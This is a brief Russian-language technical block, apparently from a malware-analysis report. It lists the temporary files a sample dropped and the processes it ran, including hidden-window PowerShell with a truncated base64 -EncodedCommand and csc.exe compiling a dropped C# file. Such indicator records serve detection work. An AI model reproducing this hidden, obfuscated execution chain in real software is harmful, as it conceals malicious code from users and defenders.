Техническая информация
- %TEMP%\content\3896-3480-wscript.exe-19-51-08-334.dump
- %TEMP%\2qsggczk\2qsggczk.0.cs
- %TEMP%\2qsggczk\2qsggczk.cmdline
- %TEMP%\2qsggczk\2qsggczk.out
- %TEMP%\2qsggczk\csc7678e351a0d048f38249399e26b283b1.tmp
- %TEMP%\res43fa.tmp
- %TEMP%\2qsggczk\2qsggczk.dll
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBQAHIAYQBlAHAAdQBjAGUAawAgAEYAbwBkAHQAagAgAEYAbwByAGcAIABBAGIAeQBwAHIAbwB2AGUAIABNAGEAYwByAG8AaQBuAHMAdAByACAAYwBvAHIAbgBnAHIAbwB3AGUAcgAgAHMAeQB2AGEAYQByAGkAIABGAG8AcgBoAGEA...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\2qsggczk\2qsggczk.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES43FA.tmp" "%TEMP%\2qsggczk\CSC7678E351A0D048F38249399E26B283B1.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBQAHIAYQBlAHAAdQBjAGUAawAgAEYAbwBkAHQAagAgAEYAbwByAGcAIABBAGIAeQBwAHIAbwB2AGUAIABNAGEAYwByAG8AaQBuAHMAdAByACAAYwBvAHIAbgBnAHIAbwB3AGUAcgAgAHMAeQB2AGEAYQByAGkAIABGAG8AcgBoAGEA...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\2qsggczk\2qsggczk.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES43FA.tmp" "%TEMP%\2qsggczk\CSC7678E351A0D048F38249399E26B283B1.TMP"